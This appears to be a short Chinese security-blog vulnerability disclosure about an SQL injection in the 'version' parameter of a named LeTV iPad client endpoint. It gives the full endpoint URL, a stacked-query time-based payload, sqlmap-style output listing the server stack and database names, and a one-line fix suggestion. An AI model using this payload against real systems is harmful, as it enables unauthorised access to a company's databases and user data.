乐视网IPAD客户端SQL注射一枚 – 网站安全 – 自学

时间: 2020-10-10|tag: 112次围观|0 条评论

http://dynamic.app.m.letv.com:80/android/dynamic.php?mod=audit&ctl=audit&act=indexv1&pcode=010510000&version=5.0
---

Place: GET
Parameter: version
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: mod=audit&ctl=audit&act=indexv1&pcode=010510000&version=5.0'; SELEC
T SLEEP(5)--
---

version参数存在注入

web application technology: Nginx, PHP 5.4.4

back-end DBMS: MySQL 5.0.11

乐视网IPAD客户端SQL注射一枚 – 网站安全 – 自学插图

 

available databases [2]:
[*] information_schema
[*] mclient

乐视网IPAD客户端SQL注射一枚 – 网站安全 – 自学插图1

跑表速度太慢了...就不跑了

mclient库有148个表

乐视网IPAD客户端SQL注射一枚 – 网站安全 – 自学插图2

修复方案:

过滤相关参数!
    上一篇: 住哪网SQL注射可造成531万用户信息泄漏 - 网站安

    下一篇: 站长之家(chinaz.com)分站一枚SQL注入 - 网站安全
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《乐视网IPAD客户端SQL注射一枚 – 网站安全 – 自学
   

还没有人抢沙发呢~